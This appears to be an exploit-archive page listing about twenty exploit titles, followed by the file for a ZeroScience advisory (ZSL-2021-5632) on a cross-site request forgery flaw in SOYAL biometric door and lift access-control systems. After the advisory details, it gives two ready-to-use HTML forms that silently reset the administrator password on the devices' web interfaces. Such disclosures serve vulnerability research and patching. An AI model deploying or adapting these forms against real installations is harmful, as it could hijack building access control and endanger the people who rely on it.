d85f0c8d35
20 changes to exploits/shellcodes KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Device Reboot (Unauthenticated) BRAdmin Professional 3.75 - 'BRA_Scheduler' Unquoted Service Path Eclipse Mosquitto MQTT broker 2.0.9 - 'mosquitto' Unquoted Service Path SOYAL 701 Server 9.0.1 - Insecure Permissions SOYAL 701 Client 9.0.1 - Insecure Permissions KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Hard coded Credentials Shell Access Plone CMS 5.2.3 - 'Title' Stored XSS LiveZilla Server 8.0.1.0 - 'Accept-Language' Reflected XSS Boonex Dolphin 7.4.2 - 'width' Stored XSS Profiling System for Human Resource Management 1.0 - Remote Code Execution (Unauthenticated) VestaCP 0.9.8 - 'v_sftp_licence' Command Injection SOYAL Biometric Access Control System 5.0 - Master Code Disclosure SOYAL Biometric Access Control System 5.0 - 'Change Admin Password' CSRF KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Command Injection (Authenticated) KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Authentication Bypass KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Remote Code Execution KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Factory Reset (Unauthenticated) KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Config Download (Unauthenticated) Online News Portal 1.0 - 'name' SQL Injection Online News Portal 1.0 - 'Multiple' Stored Cross-Site Scripting
65 lines
No EOL
2.1 KiB
HTML
65 lines
No EOL
2.1 KiB
HTML
# Exploit Title: SOYAL Biometric Access Control System 5.0 - 'Change Admin Password' CSRF
|
|
# Date: 25.01.2021
|
|
# Exploit Author: LiquidWorm
|
|
# Vendor Homepage: https://www.soyal.com.tw https://www.soyal.com
|
|
|
|
Vendor: SOYAL Technology Co., Ltd
|
|
Product web page: https://www.soyal.com.tw | https://www.soyal.com
|
|
Affected version: AR-727 i/CM - F/W: 5.0
|
|
AR837E/EF - F/W: 4.3
|
|
AR725Ev2 - F/W: 4.3 191231
|
|
AR331/725E - F/W: 4.2
|
|
AR837E/EF - F/W: 4.1
|
|
AR-727CM /i - F/W: 4.09
|
|
AR-727CM /i - F/W: 4.06
|
|
AR-837E - F/W: 3.03
|
|
|
|
Summary: Soyal Access systems are built into Raytel Door Entry Systems
|
|
and are providing access and lift control to many buildings from public
|
|
and private apartment blocks to prestigious public buildings.
|
|
|
|
Desc: The application interface allows users to perform certain actions
|
|
via HTTP requests without performing any validity checks to verify the
|
|
requests. This can be exploited to perform certain actions with administrative
|
|
privileges if a logged-in user visits a malicious web site.
|
|
|
|
Tested on: SOYAL Technology WebServer 2.0
|
|
SOYAL Serial Device Server 4.03A
|
|
SOYAL Serial Device Server 4.01n
|
|
SOYAL Serial Device Server 3.07n
|
|
|
|
|
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
|
@zeroscience
|
|
|
|
|
|
Advisory ID: ZSL-2021-5632
|
|
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5632.php
|
|
|
|
|
|
25.01.2021
|
|
|
|
--
|
|
|
|
|
|
<html>
|
|
<body>
|
|
<form action="http://192.168.1.1/userset.cgi" method="POST">
|
|
<input type="hidden" name="pw" value="test123" />
|
|
<input type="hidden" name="pw2" value="test123" />
|
|
<input type="submit" value="Forge me!" />
|
|
</form>
|
|
</body>
|
|
</html>
|
|
|
|
...
|
|
|
|
<html>
|
|
<body>
|
|
<form action="http://192.168.1.2/LoginUser.cgi" method="POST">
|
|
<input type="hidden" name="pw" value="drugtest123" />
|
|
<input type="hidden" name="pw2" value="drugtest123" />
|
|
<input type="submit" value="Forge me!" />
|
|
</form>
|
|
</body>
|
|
</html> |